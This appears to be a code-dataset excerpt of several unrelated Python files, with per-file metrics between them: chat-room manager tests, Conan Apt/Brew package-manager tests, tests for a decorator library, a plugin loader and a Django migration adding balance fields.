NoSuchRoomException, self.manager.remove_room, BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID)
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
def test_remove_room_before_create_room(self):
self._create_channel()
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
self.assertRaises(
NoSuchRoomException, self.manager.remove_room, BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID)
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
def test_remove_room_before_create_channel(self):
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
self.assertRaises(
NoSuchRoomException, self.manager.remove_room, BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID)
self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
def test_remove_room_empty_room_id(self):
self._create_channel()
self.assertRaises(NoSuchRoomException, self.manager.remove_room, BaseDatabaseTest.CHANNEL_ID, '')
def test_rename_room(self):
self._create_channel()
self._create_room()
self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.db.get_room_name(BaseDatabaseTest.ROOM_ID))
value = self.manager.rename(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID, 'new-name')
self.assertIsNone(value)
self.assertEqual('new-name', self.db.get_room_name(BaseDatabaseTest.ROOM_ID))
def test_rename_room_already_exists(self):
self._create_channel()
self._create_room()
self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.db.get_room_name(BaseDatabaseTest.ROOM_ID))
value = self.manager.rename(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID, BaseDatabaseTest.ROOM_NAME)
self.assertIsNotNone(value)
self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.db.get_room_name(BaseDatabaseTest.ROOM_ID))
def test_rename_room_no_such_room(self):
self._create_channel()
self._create_room()
value = self.manager.rename(BaseDatabaseTest.CHANNEL_ID, str(uuid()), BaseDatabaseTest.ROOM_NAME)
self.assertIsNotNone(value)
self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.db.get_room_name(BaseDatabaseTest.ROOM_ID))
def test_rename_room_blank_name(self):
self._create_channel()
self._create_room()
self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.db.get_room_name(BaseDatabaseTest.ROOM_ID))
value = self.manager.rename(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID, BaseDatabaseTest.ROOM_NAME)
self.assertIsNotNone(value)
self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.db.get_room_name(BaseDatabaseTest.ROOM_ID))
def test_name_for_uuid(self):
self._create_channel()
self._create_room()
self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.manager.name_for_uuid(BaseDatabaseTest.ROOM_ID))
def test_name_for_uuid_no_such_room(self):
self._create_channel()
self._create_room()
value = self.manager.name_for_uuid(str(uuid()))
self.assertIsNone(value)
def test_get_owners_before_create(self):
self._create_channel()
value = self.manager.get_owners(BaseDatabaseTest.ROOM_ID)
self.assertTrue(type(value) == str)
def test_get_owners(self):
self._create_channel()
self._create_room()
owners = self.manager.get_owners(BaseDatabaseTest.ROOM_ID)
self.assertTrue(type(owners) == list)
self.assertEqual(1, len(owners))
self.assertEqual(BaseDatabaseTest.USER_ID, owners[0]['uuid'])
self.assertEqual(BaseDatabaseTest.USER_NAME, owners[0]['name'])
def test_get_moderators_before_create(self):
self._create_channel()
value = self.manager.get_moderators(BaseDatabaseTest.ROOM_ID)
self.assertTrue(type(value) == str)
def test_get_moderators(self):
self._create_channel()
self._create_room()
self.db.set_moderator(BaseDatabaseTest.ROOM_ID, BaseDatabaseTest.USER_ID)
moderators = self.manager.get_moderators(BaseDatabaseTest.ROOM_ID)
self.assertTrue(type(moderators) == list)
self.assertEqual(1, len(moderators))
self.assertEqual(BaseDatabaseTest.USER_ID, moderators[0]['uuid'])
self.assertEqual(BaseDatabaseTest.USER_NAME, moderators[0]['name'])
| 47.185185
| 118
| 0.730965
| 1,194
| 10,192
| 5.956449
| 0.115578
| 0.18279
| 0.148481
| 0.190242
| 0.806665
| 0.77306
| 0.765748
| 0.739173
| 0.725956
| 0.721457
| 0
| 0.001906
| 0.176315
| 10,192
| 215
| 119
| 47.404651
| 0.845265
| 0.052787
| 0
| 0.591716
| 0
| 0
| 0.008608
| 0.002385
| 0
| 0
| 0
| 0
| 0.337278
| 1
| 0.153846
| false
| 0
| 0.029586
| 0
| 0.195266
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
210f6434dc7e0b1127d19c62648caf3cbf4fa95c
| 6,405
|
py
|
Python
|
conans/test/functional/tools/system/package_manager_test.py
|
Mu-L/conan
|
7c24ec4bbd6e8c16cdcd879403aae742689bc36a
|
[
"MIT"
] | 1
|
2019-11-04T17:23:09.000Z
|
2019-11-04T17:23:09.000Z
|
conans/test/functional/tools/system/package_manager_test.py
|
Mu-L/conan
|
7c24ec4bbd6e8c16cdcd879403aae742689bc36a
|
[
"MIT"
] | 1
|
2020-11-05T16:16:49.000Z
|
2020-11-05T16:16:49.000Z
|
conans/test/functional/tools/system/package_manager_test.py
|
Mattlk13/conan
|
005fc53485557b0a570bb71670f2ca9c66082165
|
[
"MIT"
] | null | null | null |
import platform
import textwrap
import pytest
import six
from conans.test.utils.tools import TestClient
@pytest.mark.tool_apt_get
@pytest.mark.skipif(platform.system() != "Linux", reason="Requires apt")
def test_apt_check():
client = TestClient()
client.save({"conanfile.py": textwrap.dedent("""
from conan import ConanFile
from conan.tools.system.package_manager import Apt
class MyPkg(ConanFile):
settings = "arch", "os"
def system_requirements(self):
apt = Apt(self)
not_installed = apt.check(["non-existing1", "non-existing2"])
print("missing:", not_installed)
""")})
client.run("create . test/1.0@ -s:b arch=armv8 -s:h arch=x86")
assert "dpkg-query: no packages found matching non-existing1:i386" in client.out
assert "dpkg-query: no packages found matching non-existing2:i386" in client.out
assert "missing: ['non-existing1', 'non-existing2']" in client.out
@pytest.mark.tool_apt_get
@pytest.mark.skipif(platform.system() != "Linux", reason="Requires apt")
def test_apt_install_substitutes():
client = TestClient()
conanfile_py = textwrap.dedent("""
from conan import ConanFile
from conan.tools.system.package_manager import Apt
class MyPkg(ConanFile):
settings = "arch", "os"
def system_requirements(self):
# FIXME this is needed because the ci-functional apt-get update fails
try:
self.run("sudo apt-get update")
except Exception:
pass
apt = Apt(self)
{}
""")
installs = 'apt.install_substitutes(["non-existing1", "non-existing2"], ["non-existing3", "non-existing4"])'
client.save({"conanfile.py": conanfile_py.format(installs)})
client.run("create . test/1.0@ -c tools.system.package_manager:mode=install "
"-c tools.system.package_manager:sudo=True", assert_error=True)
assert "dpkg-query: no packages found matching non-existing1:amd64" in client.out
assert "dpkg-query: no packages found matching non-existing2:amd64" in client.out
assert "dpkg-query: no packages found matching non-existing3:amd64" in client.out
assert "dpkg-query: no packages found matching non-existing4:amd64" in client.out
assert "ERROR: while executing system_requirements(): " \
"None of the installs for the package substitutes succeeded." in client.out
client.run_command("sudo apt remove nano -yy")
installs = 'apt.install_substitutes(["non-existing1", "non-existing2"], ["nano"], ["non-existing3"])'
client.save({"conanfile.py": conanfile_py.format(installs)})
client.run("create . test/1.0@ -c tools.system.package_manager:mode=install "
"-c tools.system.package_manager:sudo=True")
assert "1 newly installed" in client.out
@pytest.mark.tool_apt_get
@pytest.mark.skipif(platform.system() != "Linux", reason="Requires apt")
def test_build_require():
client = TestClient()
client.save({"tool_require.py": textwrap.dedent("""
from conan import ConanFile
from conan.tools.system.package_manager import Apt
class MyPkg(ConanFile):
settings = "arch", "os"
def system_requirements(self):
apt = Apt(self)
not_installed = apt.check(["non-existing1", "non-existing2"])
print("missing:", not_installed)
""")})
client.run("export tool_require.py tool_require/1.0@")
client.save({"consumer.py": textwrap.dedent("""
from conan import ConanFile
class consumer(ConanFile):
settings = "arch", "os"
tool_requires = "tool_require/1.0"
""")})
client.run("create consumer.py consumer/1.0@ -s:b arch=armv8 -s:h arch=x86 --build=missing")
assert "dpkg-query: no packages found matching non-existing1:arm64" in client.out
assert "dpkg-query: no packages found matching non-existing2:arm64" in client.out
assert "missing: ['non-existing1', 'non-existing2']" in client.out
@pytest.mark.tool_brew
@pytest.mark.skipif(platform.system() != "Darwin", reason="Requires brew")
def test_brew_check():
client = TestClient()
client.save({"conanfile.py": textwrap.dedent("""
from conan import ConanFile
from conan.tools.system.package_manager import Brew
class MyPkg(ConanFile):
settings = "arch"
def system_requirements(self):
brew = Brew(self)
not_installed = brew.check(["non-existing1", "non-existing2"])
print("missing:", not_installed)
""")})
client.run("create . test/1.0@")
assert "missing: ['non-existing1', 'non-existing2']" in client.out
@pytest.mark.tool_brew
@pytest.mark.skipif(platform.system() != "Darwin", reason="Requires brew")
@pytest.mark.skip(reason="brew update takes a lot of time")
def test_brew_install_check_mode():
client = TestClient()
client.save({"conanfile.py": textwrap.dedent("""
from conan import ConanFile
from conan.tools.system.package_manager import Brew
class MyPkg(ConanFile):
settings = "arch"
def system_requirements(self):
brew = Brew(self)
brew.install(["non-existing1", "non-existing2"])
""")})
client.run("create . test/1.0@", assert_error=True)
assert "System requirements: 'non-existing1, non-existing2' are missing but " \
"can't install because tools.system.package_manager:mode is 'check'" in client.out
@pytest.mark.tool_brew
@pytest.mark.skipif(platform.system() != "Darwin", reason="Requires brew")
@pytest.mark.skip(reason="brew update takes a lot of time")
def test_brew_install_install_mode():
client = TestClient()
client.save({"conanfile.py": textwrap.dedent("""
from conan import ConanFile
from conan.tools.system.package_manager import Brew
class MyPkg(ConanFile):
settings = "arch"
def system_requirements(self):
brew = Brew(self)
brew.install(["non-existing1", "non-existing2"])
""")})
client.run("create . test/1.0@ -c tools.system.package_manager:mode=install", assert_error=True)
assert "Error: No formulae found in taps." in client.out
| 42.986577
| 112
| 0.646682
| 786
| 6,405
| 5.187023
| 0.150127
| 0.029433
| 0.040471
| 0.073584
| 0.801815
| 0.77557
| 0.77557
| 0.764287
| 0.738288
| 0.701496
| 0
| 0.015289
| 0.223888
| 6,405
| 148
| 113
| 43.277027
| 0.804868
| 0
| 0
| 0.625954
| 0
| 0.030534
| 0.65808
| 0.130835
| 0
| 0
| 0
| 0
| 0.137405
| 1
| 0.045802
| false
| 0.007634
| 0.137405
| 0
| 0.183206
| 0.022901
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
216712f95db80fe7f0b1c8d753a48c126b081a9d
| 7,581
|
py
|
Python
|
test/accrocchio/test_badgeofshame.py
|
fcracker79/accrocchio
|
5c74278c47d813e53fb53e6a27db6bfcb5561f51
|
[
"MIT"
] | 12
|
2017-09-20T22:59:05.000Z
|
2022-03-09T10:02:19.000Z
|
test/accrocchio/test_badgeofshame.py
|
fcracker79/accrocchio
|
5c74278c47d813e53fb53e6a27db6bfcb5561f51
|
[
"MIT"
] | 1
|
2018-03-20T13:46:38.000Z
|
2018-03-20T21:08:53.000Z
|
test/accrocchio/test_badgeofshame.py
|
fcracker79/accrocchio
|
5c74278c47d813e53fb53e6a27db6bfcb5561f51
|
[
"MIT"
] | null | null | null |
import unittest
from unittest import mock
# noinspection PyUnresolvedReferences
from accrocchio.badgeofshame import accrocchio, detonator, epoxy, compromise, blinder, flypaper
from accrocchio.badgeofshame import this_is_a, this_is_an
from accrocchio.observers import AccrocchioObserver
class TestBadgeOfShame(unittest.TestCase):
def setUp(self):
accrocchio.reset()
assert accrocchio.how_many() == 0
def test(self):
# noinspection PyUnusedLocal
@accrocchio
def accrocchio_fun(a, b):
pass
# noinspection PyUnusedLocal
@detonator
def detonator_fun(a, b):
pass
# noinspection PyUnusedLocal
@epoxy
def epoxy_fun(a, b):
pass
self.assertEqual(0, accrocchio.how_many())
[accrocchio_fun(1, 2) for _ in range(3)]
self.assertEqual(3, accrocchio.how_many())
accrocchio.reset()
self.assertEqual(0, accrocchio.how_many())
[accrocchio_fun(1, 2) for _ in range(3)]
accrocchio.reset()
self.assertEqual(0, accrocchio.how_many())
self.assertEqual(0, detonator.how_many())
self.assertEqual(0, epoxy.how_many())
[detonator_fun(1, 2) for _ in range(3)]
[epoxy_fun(1, 2) for _ in range(4)]
self.assertEqual(7, accrocchio.how_many())
self.assertEqual(3, detonator.how_many())
self.assertEqual(4, epoxy.how_many())
accrocchio.reset()
self.assertEqual(0, accrocchio.how_many())
self.assertEqual(0, detonator.how_many()) # We expect it to have detonators being reset as well
self.assertEqual(0, epoxy.how_many())
[detonator_fun(1, 2) for _ in range(3)]
[epoxy_fun(1, 2) for _ in range(4)]
epoxy.reset()
self.assertEqual(7, accrocchio.how_many())
self.assertEqual(3, detonator.how_many())
self.assertEqual(0, epoxy.how_many())
def test_observers(self):
# noinspection PyUnusedLocal
@accrocchio
def accrocchio_fun(a, b):
pass
# noinspection PyUnusedLocal
@detonator
def detonator_fun(a, b):
pass
# noinspection PyUnusedLocal
@flypaper
def flypaper_fun(a, b):
pass
accrocchio_observer = mock.create_autospec(AccrocchioObserver)
accrocchio.add_observer(accrocchio_observer)
detonator_observer = mock.create_autospec(AccrocchioObserver)
detonator.add_observer(detonator_observer)
accrocchio_fun(1, 2)
self.assertEqual(0, accrocchio_observer.reset.call_count)
self.assertEqual(0, detonator_observer.on_accrocchio.call_count)
self.assertEqual(1, accrocchio_observer.on_accrocchio.call_count)
detonator_fun(1, 2)
self.assertEqual(1, detonator_observer.on_accrocchio.call_count)
self.assertEqual(0, accrocchio_observer.reset.call_count)
self.assertEqual(2, accrocchio_observer.on_accrocchio.call_count)
accrocchio_fun(1, 2)
self.assertEqual(0, accrocchio_observer.reset.call_count)
self.assertEqual(3, accrocchio_observer.on_accrocchio.call_count)
accrocchio.reset()
self.assertEqual(1, accrocchio_observer.reset.call_count)
self.assertEqual(1, detonator_observer.reset.call_count)
detonator.reset()
self.assertEqual(1, accrocchio_observer.reset.call_count)
self.assertEqual(2, detonator_observer.reset.call_count)
# noinspection PyUnusedLocal
def test_metaclass(self):
class AccrocchioClass(metaclass=accrocchio):
pass
class CompromiseClass(metaclass=compromise):
pass
class BlinderClass(metaclass=blinder):
pass
self.assertEqual(3, accrocchio.how_many())
self.assertEqual(1, compromise.how_many())
self.assertEqual(1, blinder.how_many())
self.assertEqual(0, epoxy.how_many())
AccrocchioClass()
self.assertEqual(4, accrocchio.how_many())
self.assertEqual(1, compromise.how_many())
self.assertEqual(1, blinder.how_many())
self.assertEqual(0, epoxy.how_many())
CompromiseClass()
self.assertEqual(5, accrocchio.how_many())
self.assertEqual(2, compromise.how_many())
self.assertEqual(1, blinder.how_many())
self.assertEqual(0, epoxy.how_many())
# noinspection PyUnusedLocal
def test_class_decorator(self):
@accrocchio
class AccrocchioClass:
pass
@compromise
class CompromiseClass:
def a_method(self):
pass
@blinder
class BlinderClass:
pass
self.assertEqual(3, accrocchio.how_many())
self.assertEqual(1, compromise.how_many())
self.assertEqual(1, blinder.how_many())
self.assertEqual(0, epoxy.how_many())
AccrocchioClass()
self.assertEqual(4, accrocchio.how_many())
self.assertEqual(1, compromise.how_many())
self.assertEqual(1, blinder.how_many())
self.assertEqual(0, epoxy.how_many())
c = CompromiseClass()
self.assertEqual(5, accrocchio.how_many())
self.assertEqual(2, compromise.how_many())
self.assertEqual(1, blinder.how_many())
self.assertEqual(0, epoxy.how_many())
c.a_method()
self.assertEqual(5, accrocchio.how_many())
self.assertEqual(2, compromise.how_many())
self.assertEqual(1, blinder.how_many())
self.assertEqual(0, epoxy.how_many())
CompromiseClass()
self.assertEqual(6, accrocchio.how_many())
self.assertEqual(3, compromise.how_many())
self.assertEqual(1, blinder.how_many())
self.assertEqual(0, epoxy.how_many())
def test_one_shot_accrocchi(self):
self.assertEqual(0, accrocchio.how_many())
[this_is_an(accrocchio) for _ in range(3)]
self.assertEqual(3, accrocchio.how_many())
accrocchio.reset()
self.assertEqual(0, accrocchio.how_many())
[this_is_an(accrocchio) for _ in range(3)]
accrocchio.reset()
self.assertEqual(0, accrocchio.how_many())
self.assertEqual(0, detonator.how_many())
self.assertEqual(0, epoxy.how_many())
[this_is_a(detonator) for _ in range(3)]
[this_is_an(epoxy) for _ in range(4)]
self.assertEqual(7, accrocchio.how_many())
self.assertEqual(3, detonator.how_many())
self.assertEqual(4, epoxy.how_many())
accrocchio.reset()
self.assertEqual(0, accrocchio.how_many())
self.assertEqual(0, detonator.how_many()) # We expect it to have detonators being reset as well
self.assertEqual(0, epoxy.how_many())
[this_is_a(detonator) for _ in range(3)]
[this_is_an(epoxy) for _ in range(4)]
epoxy.reset()
self.assertEqual(7, accrocchio.how_many())
self.assertEqual(3, detonator.how_many())
self.assertEqual(0, epoxy.how_many())
def test_context(self):
with accrocchio:
pass
with detonator:
with detonator:
pass
self.assertEqual(3, accrocchio.how_many())
self.assertEqual(2, detonator.how_many())
def test_typing(self):
def f(a: detonator[int]):
pass
self.assertEqual(1, accrocchio.how_many())
self.assertEqual(1, detonator.how_many())
f(1)
self.assertEqual(1, accrocchio.how_many())
self.assertEqual(1, detonator.how_many())
| 35.759434
| 104
| 0.64411
| 870
| 7,581
| 5.428736
| 0.088506
| 0.254076
| 0.09549
| 0.19098
| 0.794199
| 0.757358
| 0.741901
| 0.723269
| 0.703578
| 0.692568
| 0
| 0.01967
| 0.248912
| 7,581
| 211
| 105
| 35.92891
| 0.8098
| 0.046828
| 0
| 0.716763
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.468208
| 1
| 0.092486
| false
| 0.086705
| 0.028902
| 0
| 0.16185
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
dcdc575801134824c6c41b2e57a0596b069ebd61
| 175
|
py
|
Python
|
move_bot/components/__init__.py
|
rerobins/rho_move_bot
|
8e431d6a68f51db2703326d30ed3110eec824c39
|
[
"BSD-3-Clause"
] | null | null | null |
move_bot/components/__init__.py
|
rerobins/rho_move_bot
|
8e431d6a68f51db2703326d30ed3110eec824c39
|
[
"BSD-3-Clause"
] | null | null | null |
move_bot/components/__init__.py
|
rerobins/rho_move_bot
|
8e431d6a68f51db2703326d30ed3110eec824c39
|
[
"BSD-3-Clause"
] | null | null | null |
from move_bot.components.update_service import update_service
from sleekxmpp.plugins.base import register_plugin
def load_components():
register_plugin(update_service)
| 21.875
| 61
| 0.845714
| 23
| 175
| 6.130435
| 0.608696
| 0.276596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102857
| 175
| 7
| 62
| 25
| 0.898089
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dce706ac748aa4855ecc21a8e8010bfe3dd2ac39
| 1,526
|
py
|
Python
|
cointrol/core/migrations/0004_auto_20171103_2342.py
|
fakegit/cointrol
|
077bb66189ff2d3f7714ad2a7812d4860c825cba
|
[
"MIT"
] | 967
|
2015-03-19T17:28:07.000Z
|
2022-03-24T22:55:47.000Z
|
cointrol/core/migrations/0004_auto_20171103_2342.py
|
fakegit/cointrol
|
077bb66189ff2d3f7714ad2a7812d4860c825cba
|
[
"MIT"
] | 23
|
2017-03-11T23:08:13.000Z
|
2020-04-18T14:04:24.000Z
|
cointrol/core/migrations/0004_auto_20171103_2342.py
|
fakegit/cointrol
|
077bb66189ff2d3f7714ad2a7812d4860c825cba
|
[
"MIT"
] | 287
|
2017-03-15T05:15:56.000Z
|
2022-01-29T08:04:16.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-11-03 22:42
from __future__ import unicode_literals
import cointrol.core.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0003_ticker_open'),
]
operations = [
migrations.AddField(
model_name='balance',
name='eur_available',
field=cointrol.core.fields.AmountField(decimal_places=8, default=0, max_digits=30),
),
migrations.AddField(
model_name='balance',
name='eur_balance',
field=cointrol.core.fields.AmountField(decimal_places=8, default=0, max_digits=30),
),
migrations.AddField(
model_name='balance',
name='eur_reserved',
field=cointrol.core.fields.AmountField(decimal_places=8, default=0, max_digits=30),
),
migrations.AddField(
model_name='balance',
name='xrp_available',
field=cointrol.core.fields.AmountField(decimal_places=8, default=0, max_digits=30),
),
migrations.AddField(
model_name='balance',
name='xrp_balance',
field=cointrol.core.fields.AmountField(decimal_places=8, default=0, max_digits=30),
),
migrations.AddField(
model_name='balance',
name='xrp_reserved',
field=cointrol.core.fields.AmountField(decimal_places=8, default=0, max_digits=30),
),
]
| 32.468085
| 95
| 0.608126
| 165
| 1,526
| 5.436364
| 0.290909
| 0.093645
| 0.140468
| 0.180602
| 0.77592
| 0.77592
| 0.77592
| 0.730212
| 0.730212
| 0.730212
| 0
| 0.040614
| 0.273919
| 1,526
| 46
| 96
| 33.173913
| 0.768953
| 0.044561
| 0
| 0.615385
| 1
| 0
| 0.092096
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.